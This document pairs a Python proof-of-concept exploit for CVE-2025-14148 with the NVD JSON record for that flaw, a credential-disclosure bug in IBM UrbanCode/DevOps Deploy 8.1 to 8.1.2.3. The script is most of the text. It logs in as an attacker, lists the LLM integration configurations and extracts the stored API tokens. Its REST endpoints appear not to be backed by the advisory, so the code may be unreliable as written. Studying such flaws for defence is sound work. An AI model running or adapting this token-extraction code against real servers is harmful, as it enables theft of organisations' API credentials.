CVE-2025-14148

import requests import json # CVE-2025-14148 PoC - IBM UCD LLM API Token Recovery # Target: IBM UrbanCode Deploy / DevOps Deploy 8.1 - 8.1.2.3 TARGET_URL = "https://target-ibm-ucd.example.com" USERNAME = "attacker_user" PASSWORD = "password123" def exploit_llm_token_disclosure(): """ This PoC demonstrates how an authenticated user with LLM integration configuration privileges can recover previously saved LLM API Tokens. """ session = requests.Session() # Step 1: Authenticate to IBM UCD login_url = f"{TARGET_URL}/rest/security/authentication" login_data = { "userName": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data, verify=False) if response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Enumerate LLM integration configurations # Requires LLM integration configuration privileges llm_config_url = f"{TARGET_URL}/rest/integrations/llm/configurations" response = session.get(llm_config_url, verify=False) if response.status_code == 200: configs = response.json() print(f"[+] Found {len(configs)} LLM configurations") # Step 3: Extract API Tokens from configurations for config in configs: config_id = config.get("id") config_name = config.get("name") # Get detailed configuration including API Token detail_url = f"{TARGET_URL}/rest/integrations/llm/configurations/{config_id}" detail_response = session.get(detail_url, verify=False) if detail_response.status_code == 200: details = detail_response.json() api_token = details.get("apiToken") or details.get("api_key") if api_token: print(f"[*] Configuration: {config_name}") print(f"[*] API Token: {api_token}") return api_token print("[-] No LLM API Tokens found or access denied") return None if __name__ == "__main__": print("CVE-2025-14148 PoC - IBM UCD LLM Token Disclosure") print("=" * 50) token = exploit_llm_token_disclosure() if token: print(f"\n[+] Successfully recovered LLM API Token: {token}")

{"cve": {"id": "CVE-2025-14148", "sourceIdentifier": "[email protected]", "published": "2025-12-15T20:15:49.043", "lastModified": "2025-12-18T17:53:31.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM UCD - IBM DevOps Deploy 8.1 through 8.1.2.3 could allow an authenticated user with LLM integration configuration privileges to recover a previously saved LLM API Token."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:devops_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0.0", "versionEndExcluding": "8.1.2.4", "matchCriteriaId": "749B35C4-217A-4507-A9FB-85C7907D837B"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7254663", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}